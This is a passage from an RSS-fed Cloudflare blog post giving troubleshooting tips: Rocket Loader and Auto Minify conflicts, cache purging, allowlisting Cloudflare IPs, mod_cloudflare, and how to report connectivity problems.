    <p>Cloudflare has two beta features that speed up the loading of your web pages, but they can sometimes cause issues.</p><p><i><b>Rocket Loader</b></i><a href="/56590463">Rocket Loader</a> can potentially impact JavaScript calls on your site, including things that potentially use jQuery. For example, if you see an ad widget breaking, it is possible that Rocket Loader is breaking the JavaScript and you should turn this feature off by going to your Cloudflare Settings page.</p><p>If you want to keep Rocket Loader turned on for the performance boosts, you can make some edits for the service to <a href="https://support.cloudflare.com/entries/22063443-how-can-i-have-rocket-loader-ignore-my-script-s-in-automatic-mode">ignore certain scripts</a> on your site.</p><p>Note: Rocket Loader is defaulted to off upon signup. Once you turn it on or off, the change takes less than 3 minutes to take effect.</p><p><i><b>Auto Minify</b></i><a href="/an-all-new-and-improved-autominify">Auto Minify</a> rarely impacts CSS and JavaScript. However, Auto Minify can sometimes cause issues if you already have another minification service turned on. We recommend that you only have one minify option turned on for your website.</p>
    <div>
      <h4>The changes I made to my website aren't appearing:</h4>
      <a href="#the-changes-i-made-to-my-website-arent-appearing">
        
      </a>
    </div>
    <p>If you're making changes to the <a href="https://support.cloudflare.com/entries/22037282-what-file-extensions-does-cloudflare-cache-for-static-content">static content Cloudflare caches</a> on your site, including changes to JavaScript, CSS or images, it can be very easy to forget that you need to turn Cloudflare Development Mode on to bypass our cache so these changes appear immediately.If you forgot to turn on Development Mode when making the changes, you can always purge your Cloudflare cache to have these changes appear immediately. Just a reminder that by purging the cache for your website, there will be a performance impact for a couple of hours.</p>
    <div>
      <h4>Preventing site issues while on Cloudflare</h4>
      <a href="#preventing-site-issues-while-on-cloudflare">
        
      </a>
    </div>
    <p>The most important step you can take is to make sure that your server or hosting provider has the Cloudflare IP ranges allowlisted. If any attempts to connect to your site are blocked or limited in any way, this could create connectivity issues to your site for some of your visitors.Another very important step you can take is to install <a href="https://www.cloudflare.com/resources-downloads">mod_cloudflare</a> (which is an Apache module) on your server. mod_cloudflare will restore the original visitor IP back to your server logs, and is also a good way to reduce the probability that your hosting provider will limit connections from CloudFlare's IPs. If you are not using Apache, we have a list of solutions for <a href="https://support.cloudflare.com/entries/22051973-does-cloudflare-have-an-ip-module-for-nginx">nginx</a>, <a href="https://support.cloudflare.com/entries/22054997-how-do-i-restore-original-visitor-ip-with-windows-iis">Windows</a> and others in the <a href="https://support.cloudflare.com/forums/21318827-how-do-i-restore-original-visitor-ip-to-my-server-logs">CloudFlare Support Forums</a>.</p>
    <div>
      <h4>Cloudflare is Having an Issue</h4>
      <a href="#cloudflare-is-having-an-issue">
        
      </a>
    </div>
    <p>Cloudflare runs 14 data centers around the world. Sometimes issues arise at one of our data centers, and we deal with these quickly (on average, in less than 10 minutes). Only visitors in that geographic region are affected.</p><ul><li><p>We make all announcements on <a href="https://twitter.com/#!/CloudflareSys">CloudFlare's System Status</a> Twitter handle.</p></li><li><p>If you do not use Twitter, you can also follow updates on the Cloudflare system status <a href="https://www.cloudflare.com/system-status">page</a>.</p></li></ul>
    <div>
      <h4>If you get a report from one of your visitors that they can not connect to your website:</h4>
      <a href="#if-you-get-a-report-from-one-of-your-visitors-that-they-can-not-connect-to-your-website">
        
      </a>
    </div>
    <ol><li><p>Check to make sure your server is online (see instructions on to do this above)</p></li><li><p>If your server is online, make sure Cloudflare's IPs are not being blocked</p></li><li><p>If your server is online and Cloudflare's IP are not being blocked, <a href="http://support.cloudflare.com/">send us the report here</a>. In your email, include:i) Your websiteii) Where the visitor is geographically located (Issues are almost always isolated to one of our data centers. By knowing where they are located, we can investigate much quicker)iii) A description of the error page they are seeingiv) The output of a traceroute (if possible)</p></li><li><p>Temporarily deactivate Cloudflare for your website by choosing‘Deactivate' from your Cloudlare control panel. Choosing deactivate means that CloudFlare will continue to resolve DNS for your website, but none of your traffic will pass through our performance and security network. If it is a CloudFlare issue, this will immediately resolve the problem and our team can investigate the report. Once we've identified what is wrong, you will easily be able to reactivate CloudFlare. Note: You do not need to change your name servers.</p></li></ol><p>I hope these tips help you troubleshoot some of the common issues users have on Cloudlare. Please let us know if there are any other areas of confusion that we can address in either our <a href="http://support.cloudflare.com">help section</a> or in another Cloudflare blog post.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Ninjas]]></category>
            <category><![CDATA[Best Practices]]></category>
            <guid isPermaLink="false">69yzbPpETs3q0jGVvaHKM3</guid>
            <dc:creator>Damon Billian</dc:creator>
        </item>
    </channel>
</rss>